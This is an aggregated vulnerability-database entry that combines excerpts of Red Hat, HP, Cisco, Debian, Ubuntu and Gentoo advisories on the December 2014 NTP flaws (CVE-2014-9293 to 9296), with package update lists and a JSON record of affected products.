x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: ntp-4.2.6p5-2.el6_6.src.rpm

i386: ntp-4.2.6p5-2.el6_6.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntpdate-4.2.6p5-2.el6_6.i686.rpm

x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntp-perl-4.2.6p5-2.el6_6.i686.rpm

noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source: ntp-4.2.6p5-19.el7_0.src.rpm

x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: ntp-4.2.6p5-19.el7_0.src.rpm

x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: ntp-4.2.6p5-19.el7_0.src.rpm

ppc64: ntp-4.2.6p5-19.el7_0.ppc64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm ntpdate-4.2.6p5-19.el7_0.ppc64.rpm

s390x: ntp-4.2.6p5-19.el7_0.s390x.rpm ntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm ntpdate-4.2.6p5-19.el7_0.s390x.rpm

x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm

ppc64: ntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm sntp-4.2.6p5-19.el7_0.ppc64.rpm

s390x: ntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm sntp-4.2.6p5-19.el7_0.s390x.rpm

x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: ntp-4.2.6p5-19.el7_0.src.rpm

x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm

x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFUlOKcXlSAg2UNWIIRAvBoAKCfw+j4ua5JaIRMc5eKkny9G1yWlgCgufNc EvBImTd+Vq7//UExow1FP4U= =m/Eb -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .

The two patches are available from the HP Support Center (HPSC).

Reference: http://support.ntp.org/bin/view/Main/SecurityNotice

MANUAL ACTIONS: Yes - Update

If patch installation on B.11.11 or B.11.23 is not possible, mitigate with step above.

On December 19, 2014, NTP.org and US-CERT released security advisories detailing two issues regarding weak cryptographic pseudorandom number generation (PRNG), three buffer overflow vulnerabilities, and an unhandled error condition with an unknown impact.

Cisco will release free software updates that address these vulnerabilities. Attackers could use this key to reconfigure ntpd (or to exploit other vulnerabilities).

The default ntpd configuration in Debian restricts access to localhost (and possible the adjacent network in case of IPv6).

For the stable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u1.

We recommend that you upgrade your ntp packages.

References:

CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 CVE-2013-5211 SSRT102239

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

Platform Patch Kit Name

Alpha IA64 V8.4 75-117-380_2015-08-24.BCK

NOTE: Please contact OpenVMS Technical Support to request these patch kits. ============================================================================ Ubuntu Security Notice USN-2449-1 December 22, 2014

ntp vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 14.10
Ubuntu 14.04 LTS
Ubuntu 12.04 LTS
Ubuntu 10.04 LTS

Summary:

Several security issues were fixed in NTP. The default compiler options for affected releases should reduce the vulnerability to a denial of service. In addition, attackers would be isolated by the NTP AppArmor profile. (CVE-2014-9295)

Stephen Roettger discovered that NTP incorrectly continued processing when handling certain errors. (CVE-2014-9296)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.10: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.1

Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.1

Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.2

Ubuntu 10.04 LTS: ntp 1:4.2.4p8+dfsg-1ubuntu2.2

After a standard system update you need to regenerate any MD5 keys that were manually created with ntp-keygen. The net-misc/ntp package contains the official reference implementation by the NTP Project.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/ntp < 4.2.8 >= 4.2.8

Description

Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.

Resolution

All NTP users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8"

References

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-201412-34.xml

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201412-0612",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ntp",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "ntp",
        "version": "4.2.7"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "efficientip",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "omniti",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "watchguard",
        "version": null
      },
      {
        "model": "paging server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "3000"
      },
      {
        "model": "download server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.2.7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.10"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "opensuse evergreen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11.4"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.2"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "12.3"
      },
      {
        "model": "enterprise linux workstation optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux workstation optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux server optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux server optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux hpc node optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux desktop optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux computenode optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux computenode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux client optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.2"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.1"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.4.1"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "9.9.1"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "9.7.3"
      },
      {
        "model": "network time protocol 4.2.7p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "meinberg",
        "version": null
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.7"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.6"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.5"
      },
      {
        "model": "network time protocol 4.2.4p8@lennon-o-lpv",
        "scope": null,
        "trust": 0.3,
        "vendor": "meinberg",
        "version": null
      },
      {
        "model": "network time protocol 4.2.4p7@copenhagen-o",
        "scope": null,
        "trust": 0.3,
        "vendor": "meinberg",
        "version": null
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.4"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.2"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.0"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.1.0"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.0"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1x8664"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1"
      },
      {
        "model": "vgw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "nsmexpress",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "nsm server software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "nsm series appliances",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "nsm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "junos os 14.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1r2-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r3-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r2-s3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.2x51-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.2r5-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.2r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.1x50-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.1r4-s3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.1r4-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.3r8",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.3r7",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.2x50-d70",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.2r9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x47-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x47-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x46-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x46-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x44-d40",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 11.4r12-s4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 11.4r12-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "xeon phi 7120p",
        "scope": null,
        "trust": 0.3,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi 7120a",
        "scope": null,
        "trust": 0.3,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi 5110p",
        "scope": null,
        "trust": 0.3,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi 3120a",
        "scope": null,
        "trust": 0.3,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "3.4"
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "3.3"
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "3.2"
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "3.1"
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "2.1"
      },
      {
        "model": "smartcloud entry fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.19"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "77100"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "77000"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "76000"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "71005.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "71005.2"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "51005.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "51005.2"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "41005.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "41005.2"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "31005.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "31005.2"
      },
      {
        "model": "pureflex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3950x6"
      },
      {
        "model": "pureflex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3850x6"
      },
      {
        "model": "pureflex x240m5+pen",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "pureflex x240m4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "pureflex x220m4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "puredata system for operational analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "puredata system for operational analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.8.2.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.8.1.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.9.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.8.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.7.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.3.0"
      },
      {
        "model": "nextscale nx360m5",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "nextscale nx360m4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.3"
      },
      {
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.2.0"
      },
      {
        "model": "idataplex dx360m4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rack v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "x8000"
      },
      {
        "model": "v1300n v100r002c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "tecal xh621 v100r001c00b010",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "tecal xh320 v100r001c00spc105",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "tecal xh311 v100r001c00spc100",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "tecal xh310 v100r001c00spc100",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh5885h v100r003c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v3"
      },
      {
        "model": "rh5885 v100r003c01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v3"
      },
      {
        "model": "rh5885 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2485 v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2288h v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2288e v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2288 v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2285h v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2285 v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh1288 v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "oceanstor uds v100r002c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor uds v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s6800t v200r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s5800t v200r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s5600t v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s5500t v200r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s2600t v200r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
